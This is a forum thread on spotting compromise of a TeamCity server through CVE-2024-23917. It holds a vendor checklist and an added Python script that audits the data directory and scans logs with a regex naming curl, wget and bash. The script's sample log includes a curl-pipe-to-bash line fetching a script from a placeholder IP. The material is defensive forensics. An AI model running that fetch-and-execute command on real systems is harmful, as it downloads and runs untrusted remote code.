Is there any way to find out if CVE-2024-23917 has been exploited?
Hi,
I'd like to know if a given CI server has been compromised by the recent TeamCity vulnerability described at
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23917
Obviously an attacker could hide any traces once he has gained full control of the system, but supposing that is quite sloppy, is there any way to find out whether or not this has been exploited?
Thanks in advance for your help.
- There are no unknown internal properties under Administration - Diagnostics, or in the internal.properties file in the data directory.
- There are no unknown plugins; this can be verified both in the UI's Administration - Plugins list and in the plugins subfolder of the data directory.
- There are no unknown tools; this can be verified both in the UI's Administration - Tools and in the plugins/.tools subfolder of the data directory.
- Projects and/or build configurations that the attacker could have created.
- Any additional unknown users that might have been created.
- Known users, particularly admin users, don't have unknown tokens. This was one of the most common approaches for attacks, so removing all tokens and recreating those you might use would be ideal.
- The teamcity-activities.log can contain information on some of the scripts and commands run by attackers.
- The audit feature (under Administration - Audit) can contain information about certain actions happening on the server. It should contain information on project and user changes, so you can use it to identify possible changes performed by the attacker.
If you believe your server has been compromised, please don't hesitate to send us a request via the Submit a request button on the top of the page, and consider the possibility of hiring a cyber security forensics specialist to dig deeper into your personal setup and try to identify issues.
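The file-system part of the checklist in the reply above (unknown internal properties, plugins and tools) is easiest to do mechanically against a baseline of what you know you installed, so that nothing gets overlooked in a long plugin list. The script below is an added example, not JetBrains code and not part of the original thread. It assumes the layout config/internal.properties, plugins/ and plugins/.tools/ under the data directory; the baseline sets, the suspicious-command pattern, the demo directory tree and the sample log lines are all constructed for the demo, and the real teamcity-activities.log format will differ from the sample lines, so treat the log scan as a starting point for grep, not as a signature:

```python
"""Compare a TeamCity data directory against a known-good baseline.

Added example (not JetBrains code).  Assumed layout, following the support
reply: <data_dir>/config/internal.properties, <data_dir>/plugins and
<data_dir>/plugins/.tools.  Baseline sets and sample data are constructed.
"""
import os
import re
import tempfile

# Baseline: what the operator knows they installed (constructed, hypothetical names).
BASELINE = {
    "properties": {"teamcity.example.option"},
    "plugins": {"company-plugin.zip"},
    "tools": {"maven3"},
}

# Command fragments that have no business in the activity log of a server
# that only orchestrates builds.  Constructed list; extend for your environment.
SUSPICIOUS = re.compile(r"(curl|wget|powershell|certutil|/bin/sh|bash -c|base64)", re.I)


def parse_properties(text):
    """Parse Java .properties text: key=value or key: value, # and ! comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2)
    return props


def list_entries(path):
    """Names in a directory, or an empty set if it does not exist."""
    return set(os.listdir(path)) if os.path.isdir(path) else set()


def audit_data_dir(data_dir, baseline=BASELINE):
    """Return on-disk properties, plugins and tools that are not in the baseline."""
    prop_file = os.path.join(data_dir, "config", "internal.properties")
    props = {}
    if os.path.exists(prop_file):
        with open(prop_file, encoding="utf-8") as fh:
            props = parse_properties(fh.read())
    plugins_dir = os.path.join(data_dir, "plugins")
    plugins = {n for n in list_entries(plugins_dir) if n != ".tools"}
    tools = list_entries(os.path.join(plugins_dir, ".tools"))
    return {
        "unknown_properties": sorted(set(props) - baseline["properties"]),
        "unknown_plugins": sorted(plugins - baseline["plugins"]),
        "unknown_tools": sorted(tools - baseline["tools"]),
    }


def scan_activity_log(lines, pattern=SUSPICIOUS):
    """Return log lines that match the suspicious-command pattern."""
    return [ln for ln in lines if pattern.search(ln)]


# Constructed sample lines; the real teamcity-activities.log format differs.
SAMPLE_LOG = [
    "[2024-02-10 10:01:02] build #42 started by user alice",
    "[2024-02-10 10:03:15] build step: curl -s http://203.0.113.7/x.sh | bash -c 'sh'",
    "[2024-02-10 10:05:40] build #43 finished",
]


def build_demo_tree(root):
    """Create a sample data directory with one planted unknown of each kind."""
    os.makedirs(os.path.join(root, "config"))
    os.makedirs(os.path.join(root, "plugins", ".tools", "maven3"))
    os.makedirs(os.path.join(root, "plugins", ".tools", "nc-1.0"))  # planted tool
    with open(os.path.join(root, "config", "internal.properties"), "w", encoding="utf-8") as fh:
        fh.write("# constructed sample\nteamcity.example.option=true\nunexpected.option=1\n")
    for name in ("company-plugin.zip", "helper.zip"):  # helper.zip is planted
        open(os.path.join(root, "plugins", name), "w").close()


def run_demo():
    """Build the sample tree, audit it, and scan the sample log."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        findings = audit_data_dir(root)
    findings["suspicious_log_lines"] = scan_activity_log(SAMPLE_LOG)
    return findings


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Point audit_data_dir at the real data directory and fill BASELINE from your deployment records rather than from the current directory contents, otherwise anything the attacker planted becomes part of the baseline. Users, tokens, projects and build configurations live in the database and the UI rather than on disk, so those items still need the audit log and the Administration pages the reply describes.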